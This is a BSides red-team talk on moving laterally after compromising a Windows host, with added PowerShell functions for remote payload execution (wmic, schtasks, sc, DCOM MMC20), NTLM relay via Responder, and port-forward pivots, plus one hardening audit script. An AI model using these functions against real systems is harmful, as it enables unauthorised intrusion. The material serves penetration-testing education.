BSIDES
FIRST TIME PRESENTERS
Movement After Initial Compromise
MATT BATTEN (@SleepZ3R0)
COLLYN HARTLEY (@HA12TL3Y)
Matt Batten (SleepZ3R0)
▶ Twitter: @SleepZ3R0
▶ https://github.com/SleepZ3R0
▶ Where I work:
▶ Husband / Red Teamer / Penetration Tester / Developer / Marine Corps Veteran / Cat Dad
Collyn Hartley (HA12TL3Y)
▶ Twitter: @HA12TL3Y
▶ Military Red Teamer
▶ Brother / Red Teamer / Penetration Tester / Active Duty Military / Dog Dad
What will be covered
▶ Initial Recon once on a compromised system
▶ Lateral movement
▶ How to do port forwarding in more than one way with real examples
▶ How to utilize tradecraft to not get caught while moving
▶ What tools are being used today
Setting the Stage
▶ You have already compromised a system utilizing your preferred method
First things first…
Once on a compromised system, here are some questions to ask yourself.
▶ Who am I on this network?
▶ Where am I in this network?
▶ Can I move to another system with my current permissions?
▶ Can I get system on my current compromised system?
Understand your surroundings
Part 1
▶ net user
▶ net user /domain
▶ net group "Domain Admins" /domain
▶ net group /domain
▶ net use
▶ net start
▶ net localgroup /domain
▶ netstat -ano
▶ netsh firewall show state
▶ netsh firewall show config
(The netsh firewall context is deprecated since Vista and only reports the legacy profile; on current hosts use the netsh advfirewall context for the real rule set.)
Understand your surroundings
Part 2
▶ ipconfig /all
▶ route print
▶ tasklist /SVC
▶ arp -a
▶ driverquery
▶ hostname
▶ wmic qfe
▶ set
▶ systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
▶ schtasks /query /fo LIST /v
▶ whoami
▶ whoami /all
▶ echo %logonserver%
▶ echo %username%
Screenshots of the output of the commands above: net user, net user /domain, net group "domain admins" /domain, net group /domain, net start, net localgroup /domain, netstat -ano, netsh firewall show state, netsh firewall show config, route print, tasklist /SVC, driverquery, arp -a, set, schtasks /query /fo list /v, whoami, echo %logonserver%, echo %username%
DLL Hijacking
▶ PowerUp (part of PowerSploit) has built-in DLL hijacking checks (Find-ProcessDLLHijack, Find-PathDLLHijack and Write-HijackDll) that can be used to escalate privileges on the box you are already on, which answers the "Can I get SYSTEM on my current compromised system?" question before you try to move.
Remote Code Execution #1
▶ WMIC (each "shell" below is the Cobalt Strike Beacon command that runs the line through cmd.exe; all three methods need local admin on the target, and the payload must already be staged there, e.g. copied over the ADMIN$ share)
shell wmic /node:<target> process call create "C:\windows\temp\matt.exe"
The process is spawned by WmiPrvSE.exe on the target under the calling account.
Remote Code Execution #2
▶ SCHTASKS
shell schtasks /create /tn <matt> /tr c:\windows\temp\matt.exe /sc once /st 00:00 /s <target> /RU SYSTEM
shell schtasks /run /tn <matt> /s <target>
Then delete the task after it executes:
shell schtasks /delete /tn <matt> /s <target> /F
(/RU SYSTEM runs the task as LocalSystem. Task creation and deletion are logged on the target as Security events 4698/4699 when object-access auditing is on.)
Remote Code Execution #3
▶ SERVICE (SC)
shell sc \\<target> create <matt> binpath= "c:\windows\temp\matt.exe"
shell sc \\<target> start <matt>
Make sure to delete the service after it runs:
shell sc \\<target> delete <matt>
(The space after binpath= is required by sc.exe. A plain executable is not a real service, so start returns error 1053 even though the payload ran, and the target always logs System event 7045, "A service was installed in the system".)
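The three primitives above wrapped in one PowerShell function, as an added example that is not from the talk. It first answers the "can I move with my current permissions?" question by touching the target's ADMIN$ share, then runs the chosen method and cleans up after itself. The host name WIN-TARGET, the task/service name matt and the payload path are placeholders in the slides' style, and the payload is assumed to be staged on the target already. Because wmic.exe is deprecated and missing on recent Windows 11 builds, the wmic branch falls back to the equivalent Win32_Process.Create call through CIM over DCOM.

```powershell
# Added example, not from the talk. Wraps the three cmd.exe remote-execution
# primitives from the slides. Assumes: local admin on $Target, payload already
# staged at $Payload on the target, TCP 135/445 reachable. Names are placeholders.
function Invoke-RemoteExec {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Target,
        [string]$Payload = 'C:\Windows\Temp\matt.exe',
        [string]$Name    = 'matt',
        [ValidateSet('wmic', 'schtasks', 'sc')][string]$Method = 'wmic'
    )

    # "Can I move to another system with my current permissions?"
    # Reaching ADMIN$ means the current token is a local admin on the target.
    if (-not (Test-Path "\\$Target\ADMIN$")) {
        throw "\\$Target\ADMIN$ not reachable: no local admin there, escalate or pick another host"
    }

    switch ($Method) {
        'wmic' {
            # Win32_Process.Create over DCOM; the child process hangs off WmiPrvSE.exe
            if (Get-Command wmic.exe -ErrorAction SilentlyContinue) {
                wmic "/node:$Target" process call create $Payload
            } else {
                # wmic.exe is deprecated/removed on recent Windows; same call via CIM over DCOM
                $s = New-CimSession -ComputerName $Target -SessionOption (New-CimSessionOption -Protocol Dcom)
                Invoke-CimMethod -CimSession $s -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $Payload }
                Remove-CimSession $s
            }
        }
        'schtasks' {
            # /RU SYSTEM runs as LocalSystem; /F overwrites a leftover task of the same name
            schtasks /create /tn $Name /tr $Payload /sc once /st 00:00 /s $Target /RU SYSTEM /F
            schtasks /run /tn $Name /s $Target
            Start-Sleep -Seconds 5
            schtasks /delete /tn $Name /s $Target /F
        }
        'sc' {
            # 'sc' alone is a PowerShell alias for Set-Content, so call sc.exe explicitly.
            # The space after binpath= is required. A plain exe is not a real service, so
            # start returns error 1053 although the payload did run; delete regardless.
            sc.exe "\\$Target" create $Name binpath= $Payload
            sc.exe "\\$Target" start $Name
            Start-Sleep -Seconds 5
            sc.exe "\\$Target" delete $Name
        }
    }
}

# Usage (placeholder host):
# Invoke-RemoteExec -Target WIN-TARGET -Method schtasks
```

Every branch leaves a distinct artifact on the target (a WmiPrvSE.exe child, a 4698/4699 task pair, a 7045 service install), which is why the cleanup steps are in the function rather than left to the operator's memory.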
PSEXEC
▶ Sysinternals PsExec copies its service binary (PSEXESVC) to the target's ADMIN$ share and starts it through the Service Control Manager, so it needs the same local admin rights as the SC method above and leaves the same 7045 service-install event, plus the PSEXESVC binary and named pipe, as artifacts.
WinRM
▶ Listens on TCP 5985 (HTTP) and 5986 (HTTPS). Even on 5985 the message body is encrypted by the Kerberos/NTLM (Negotiate) authentication unless Basic auth with AllowUnencrypted has been configured; 5986 adds TLS around the whole transport.
▶ If 5985 is open you can enumerate the service without credentials (Test-WSMan answers the anonymous Identify request), and with local admin on the target (or membership in its Remote Management Users group) run commands:
Invoke-Command -ComputerName TARGET -ScriptBlock {commands}
▶ Windows Server 2008 and newer also ship Windows Remote Shell (winrs), a cmd.exe over the same WS-Management transport:
winrs -r:http://WIN-2NE38K15TGH/wsman "cmd"
Remote Registry
DCOM
▶ Matt Nelson (enigma0x3) documented this method of using DCOM over RPC to instantiate the "MMC20.Application" COM object on the target and then calling its Document.ActiveView.ExecuteShellCommand method.
▶ Result:
▶ Immediate command execution under the administrative account used; the spawned process is a child of mmc.exe on the target.
▶ Implementation details:
▶ The client connects to the RPC endpoint mapper (the RpcSs service, hosted in svchost.exe, listening on TCP 135), which hands back the dynamic port of the DCOM server (in the 49152 to 65535 range on Vista and later, e.g. 49154 or 49159). Both TCP 135 and that dynamic range must be reachable through the target's firewall, and the caller needs local admin rights on the target.
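The MMC20.Application technique the slide describes, written out in PowerShell as an added example. This is not the talk's own code and is a reimplementation of the approach Matt Nelson published, not his script. It assumes local admin on the target, TCP 135 plus the dynamic RPC range open, and placeholder host and payload names.

```powershell
# Added example, not from the talk: DCOM lateral movement via MMC20.Application.
# Assumes local admin on $Target and TCP 135 + dynamic RPC reachable.
# $Target and $Command are placeholders.
function Invoke-Mmc20Exec {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Target,
        [string]$Command = 'C:\Windows\Temp\matt.exe'
    )

    # Resolve the ProgID on the remote machine; the CLSID lookup and the
    # activation both happen there, over the DCOM/RPC path the slide describes.
    $type = [Type]::GetTypeFromProgID('MMC20.Application', $Target)
    if (-not $type) { throw "MMC20.Application not resolvable on $Target (no admin, DCOM blocked, or class missing)" }

    $mmc = [Activator]::CreateInstance($type)
    try {
        # ExecuteShellCommand(Command, Directory, Parameters, WindowState)
        # WindowState "7" = minimized. The new process runs under the caller's
        # account and shows up on the target as a child of mmc.exe.
        $mmc.Document.ActiveView.ExecuteShellCommand('cmd.exe', $null, "/c $Command", '7')
    }
    finally {
        # Drop our proxy. mmc.exe may linger on the target; that lingering
        # mmc.exe started by DcomLaunch is the artifact defenders look for.
        [void][Runtime.InteropServices.Marshal]::ReleaseComObject($mmc)
    }
}

# Usage (placeholder host):
# Invoke-Mmc20Exec -Target WIN-TARGET
```

Nothing is written to disk on the target and no service or task is created, which is the appeal over the SC and SCHTASKS methods; the trade-off is the unusual parent/child chain (svchost DcomLaunch, mmc.exe, cmd.exe) that endpoint telemetry catches easily.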
MIMIKATZ
Responder
LLMNR and NBT-NS spoofing is still an easy way to harvest credentials (NetNTLMv1/v2 challenge-responses) and move laterally, because it rides on normal network traffic: when a host looks up a name that DNS cannot resolve, it falls back to multicast LLMNR and broadcast NBT-NS, and Responder answers those queries first and collects the authentication that follows.
RunFinger.py
▶ Responder's fingerprinting script: reports OS version, domain and whether SMB signing is required on each host, which is how you pick relay targets for MultiRelay.
Multi-Relay
▶ A powerful pentest utility included in Responder's tools folder that performs targeted NTLMv1 and NTLMv2 relay against a selected target.
▶ Currently MultiRelay relays HTTP, WebDAV, proxy and SMB authentications to an SMB server.
▶ The tool can be given a list of users to relay; the idea is to only relay Domain Admins, local administrators or other privileged accounts.
▶ Relay only works against targets that do not require SMB signing, and an authentication cannot be relayed back to the host it came from.
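The settings that make a host a victim of the Responder plus MultiRelay chain above are all local configuration, so the check a practitioner wants on either side of an engagement is an audit of them. The following PowerShell is an added example, not from the talk and not Responder code: it reads the documented policy registry values and Win32_NetworkAdapterConfiguration, reports each exposure, and with -Fix turns the setting off. Run it elevated on the host being checked.

```powershell
# Added example, not from the talk. Audits (and with -Fix hardens) the three settings
# the LLMNR/NBT-NS poisoning + NTLM relay chain depends on. Run as local admin.
function Get-LlmnrRelayExposure {
    [CmdletBinding()]
    param([switch]$Fix)

    $findings = @()

    # 1. LLMNR: policy value EnableMulticast = 0 disables multicast name resolution.
    $dnsKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    $llmnr = (Get-ItemProperty -Path $dnsKey -Name EnableMulticast -ErrorAction SilentlyContinue).EnableMulticast
    if ($llmnr -ne 0) {
        $findings += 'LLMNR enabled: Responder can answer failed name lookups'
        if ($Fix) {
            New-Item -Path $dnsKey -Force | Out-Null
            Set-ItemProperty -Path $dnsKey -Name EnableMulticast -Value 0 -Type DWord
        }
    }

    # 2. NBT-NS: TcpipNetbiosOptions 2 = disabled, set per IP-enabled adapter.
    $nics = Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE'
    foreach ($nic in $nics) {
        if ($nic.TcpipNetbiosOptions -ne 2) {
            $findings += "NetBIOS over TCP/IP enabled on $($nic.Description)"
            if ($Fix) {
                Invoke-CimMethod -InputObject $nic -MethodName SetTcpipNetbios `
                    -Arguments @{ TcpipNetbiosOptions = 2 } | Out-Null
            }
        }
    }

    # 3. SMB server signing: without RequireSecuritySignature = 1 a relayed NTLM
    #    authentication gets a usable SMB session on this host.
    $smbKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $sign = (Get-ItemProperty -Path $smbKey -Name RequireSecuritySignature -ErrorAction SilentlyContinue).RequireSecuritySignature
    if ($sign -ne 1) {
        $findings += 'SMB server signing not required: NTLM relay to this host will succeed'
        if ($Fix) { Set-ItemProperty -Path $smbKey -Name RequireSecuritySignature -Value 1 -Type DWord }
    }

    if ($findings.Count -eq 0) { 'No LLMNR/NBT-NS/relay exposure found' } else { $findings }
}

# Usage: Get-LlmnrRelayExposure          # report only
#        Get-LlmnrRelayExposure -Fix     # disable LLMNR and NBT-NS, require SMB signing
```

The LLMNR value takes effect for new lookups immediately, the NetBIOS change applies to the adapter at once, and the SMB signing change needs the LanmanServer service restarted (or a reboot) before the server enforces it. On an engagement the same three checks, read remotely, tell you which hosts RunFinger.py will flag as relay targets.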
PORT FORWARDING
▶ SSH local port forwarding (the attacker box listens on 8080 and the compromised host relays each connection to internalTarget:80; add -N if you do not want a shell as well):
ssh -L 8080:internalTarget:80 user@compromisedMachine
▶ Metasploit port forwarding (from a Meterpreter session on the pivot: local 3389 goes to the pivot's view of 172.16.194.191:3389):
portfwd add -l 3389 -p 3389 -r 172.16.194.191
▶ Plink port forwarding (from a Windows host: local 444 goes to host-C:3389 through the SSH server on host-B; -C compresses the tunnel). Note that a password passed with -pw is visible to anyone who can read process command lines on that host, so prefer a key file with -i where you can:
plink.exe {host-B} -P 22 -C -L 127.0.0.1:444:{host-C}:3389 -l username -pw password
▶ Proxychains with SOCKS from Cobalt Strike: the Beacon socks command opens a SOCKS proxy on the team server, so proxychains.conf points at the team server's address and that port, and every tool you launch under proxychains then rides the Beacon into the target network.
Port Forwarding with SOCKS (screenshot)
Port Forwarding through Meterpreter (screenshots)
Hosting Payload (screenshot)
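A fourth way to forward a port, not on the slides but in their spirit: do it on the compromised Windows host itself with netsh portproxy, so no SSH server, Meterpreter session or Beacon is needed on the pivot. This is an added example, not the talk's code. It needs local admin and the IP Helper service (iphlpsvc), which hosts the portproxy listener; listen port, target address and rule name are placeholders.

```powershell
# Added example, not from the talk: port forwarding on the compromised Windows host
# with netsh portproxy. Needs local admin and the IP Helper service (iphlpsvc).
# Ports, addresses and the rule name are placeholders.
function Add-WindowsPortForward {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$ConnectAddress,   # internal host the attacker cannot reach directly
        [int]$ConnectPort = 3389,
        [int]$ListenPort  = 4444,                        # port opened on this pivot host
        [switch]$Remove
    )
    $rule = "portproxy-$ListenPort"

    if ($Remove) {
        # Cleanup: drop both the proxy entry and the firewall rule we added.
        netsh interface portproxy delete v4tov4 "listenport=$ListenPort" listenaddress=0.0.0.0
        netsh advfirewall firewall delete rule "name=$rule"
        return
    }

    if ((Get-Service iphlpsvc).Status -ne 'Running') { Start-Service iphlpsvc }

    # Every TCP connection to <pivot>:$ListenPort is relayed to $ConnectAddress:$ConnectPort.
    netsh interface portproxy add v4tov4 "listenport=$ListenPort" listenaddress=0.0.0.0 `
        "connectport=$ConnectPort" "connectaddress=$ConnectAddress"

    # Without an allow rule the host firewall drops inbound SYNs to the new listener.
    netsh advfirewall firewall add rule "name=$rule" dir=in action=allow protocol=TCP "localport=$ListenPort"

    # Verify: the entry is listed and svchost (IP Helper) is listening on the port.
    netsh interface portproxy show v4tov4
    Get-NetTCPConnection -LocalPort $ListenPort -State Listen -ErrorAction SilentlyContinue
}

# Usage on the pivot:     Add-WindowsPortForward -ConnectAddress 10.10.20.5
# From the attacker box:  rdesktop <pivot>:4444          (placeholder addresses)
# Cleanup on the pivot:   Add-WindowsPortForward -ConnectAddress 10.10.20.5 -Remove
```

Portproxy entries persist across reboots (they live under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy), so the -Remove path matters at the end of the engagement; the same registry key and netsh interface portproxy show all are what a defender checks for leftover pivots.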
BloodHound
References
▶ http://www.itprotoday.com/management-mobility/psexec
▶ http://g-laurent.blogspot.com/2016/10/introducing-responder-multirelay-10.html
▶ https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
▶ https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python
▶ https://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
▶ https://github.com/gentilkiwi/mimikatz
▶ https://specterops.io/
▶ https://github.com/rsmudge
▶ https://www.reddit.com/r/AskNetsec/comments/87cfh0/responderpy_mitigation/ (n00py)
▶ https://github.com/BloodHoundAD/BloodHound/
▶ https://blog.rapid7.com/2012/11/08/abusing-windows-remote-management-winrm-with-metasploit/
▶ https://www.cybereason.com/blog/dcom-lateral-movement-techniques
▶ https://blog.varonis.com/dcom-distributed-component-object-model
People who have influenced us and this talk
(even if they don’t know it!)
@harmj0y @malwareunicorn
@_wald0 @ReL1K
@CptJesus @mstair
@MadHatt3r @MalwareJake
@shortxstack @enigma0x3
@r3dQu1nn @danielhbohannon
@merrillmatt011 @georgiaweidman
@PyroTek3 @mubix
@byt3bl33d3r @H011YxW00D
@armitagehacker @Lee_Holmes
@gentilkiwi @SpecterOps
If you enjoyed this talk and would
like to know more
▶ Check out the references on the earlier slide.
▶ Slides will be published publicly.
▶ Because we do not know where we are posting the slides yet, if you follow us on Twitter we will let you know shortly.
▶ If you have any questions or are just interested in talking, feel free to message either of us on Twitter, and we will respond in a timely manner.
▶ @SleepZ3R0
▶ https://github.com/SleepZ3R0
▶ @HA12TL3Y
Questions?

More Related Content

What's hot

Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentationOlehLevytskyi1
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at youRob Fuller
 
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...Moabi.com
 
Technical Overview of QUIC
Technical  Overview of QUICTechnical  Overview of QUIC
Technical Overview of QUICshigeki_ohtsu
 
7.2.1.8 lab using wireshark to observe the tcp 3-way handshake
7.2.1.8 lab   using wireshark to observe the tcp 3-way handshake7.2.1.8 lab   using wireshark to observe the tcp 3-way handshake
7.2.1.8 lab using wireshark to observe the tcp 3-way handshakegabriel morillo
 
Linux networking commands
Linux networking commandsLinux networking commands
Linux networking commandsSayed Ahmed
 
Ethernet Shield
Ethernet ShieldEthernet Shield
Ethernet ShieldTinker
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawRedspin, Inc.
 
Fail2ban - the system security for green hand -on linux os
Fail2ban  - the system security  for green hand -on linux osFail2ban  - the system security  for green hand -on linux os
Fail2ban - the system security for green hand -on linux osSamina Fu (Shan Jung Fu)
 
Hacking and Computer Forensics
Hacking and Computer ForensicsHacking and Computer Forensics
Hacking and Computer ForensicsKristian Arjianto
 
Networking in linux
Networking in linuxNetworking in linux
Networking in linuxVarnnit Jain
 
Dc10 beale-attackdefendunix
Dc10 beale-attackdefendunixDc10 beale-attackdefendunix
Dc10 beale-attackdefendunixPriya Kelkar
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationRobert Rowley
 
Nessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq HanayshaNessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq HanayshaHanaysha
 
Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Abhichai L.
 

What's hot (19)

Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentation
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
 
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
 
Technical Overview of QUIC
Technical  Overview of QUICTechnical  Overview of QUIC
Technical Overview of QUIC
 
7.2.1.8 lab using wireshark to observe the tcp 3-way handshake
7.2.1.8 lab   using wireshark to observe the tcp 3-way handshake7.2.1.8 lab   using wireshark to observe the tcp 3-way handshake
7.2.1.8 lab using wireshark to observe the tcp 3-way handshake
 
Linux networking commands
Linux networking commandsLinux networking commands
Linux networking commands
 
Ethernet Shield
Ethernet ShieldEthernet Shield
Ethernet Shield
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
 
Containers for sysadmins
Containers for sysadminsContainers for sysadmins
Containers for sysadmins
 
Fail2ban - the system security for green hand -on linux os
Fail2ban  - the system security  for green hand -on linux osFail2ban  - the system security  for green hand -on linux os
Fail2ban - the system security for green hand -on linux os
 
Hacking and Computer Forensics
Hacking and Computer ForensicsHacking and Computer Forensics
Hacking and Computer Forensics
 
Networking in linux
Networking in linuxNetworking in linux
Networking in linux
 
Dc10 beale-attackdefendunix
Dc10 beale-attackdefendunixDc10 beale-attackdefendunix
Dc10 beale-attackdefendunix
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumeration
 
Nessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq HanayshaNessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq Hanaysha
 
Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178
 

Similar to Bsides final

Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsAPNIC
 
FIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamersjasonjfrank
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Time Series Database and Tick Stack
Time Series Database and Tick StackTime Series Database and Tick Stack
Time Series Database and Tick StackGianluca Arbezzano
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStormShu Sugimoto
 
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdffaker1842002
 
Trying and evaluating the new features of GlusterFS 3.5
Trying and evaluating the new features of GlusterFS 3.5Trying and evaluating the new features of GlusterFS 3.5
Trying and evaluating the new features of GlusterFS 3.5Keisuke Takahashi
 
Profiling your Java Application
Profiling your Java ApplicationProfiling your Java Application
Profiling your Java ApplicationVictor Rentea
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Andrew Case
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
What's New and Newer in Apache httpd-24
What's New and Newer in Apache httpd-24What's New and Newer in Apache httpd-24
What's New and Newer in Apache httpd-24Jim Jagielski
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?Tomasz Jakubowski
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraftenigma0x3
 

Similar to Bsides final (20)

Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
FIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT Devices
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
The Veil-Framework
The Veil-FrameworkThe Veil-Framework
The Veil-Framework
 
Time Series Database and Tick Stack
Time Series Database and Tick StackTime Series Database and Tick Stack
Time Series Database and Tick Stack
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStorm
 
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
 
Trying and evaluating the new features of GlusterFS 3.5
Trying and evaluating the new features of GlusterFS 3.5Trying and evaluating the new features of GlusterFS 3.5
Trying and evaluating the new features of GlusterFS 3.5
 
Profiling your Java Application
Profiling your Java ApplicationProfiling your Java Application
Profiling your Java Application
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rules
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
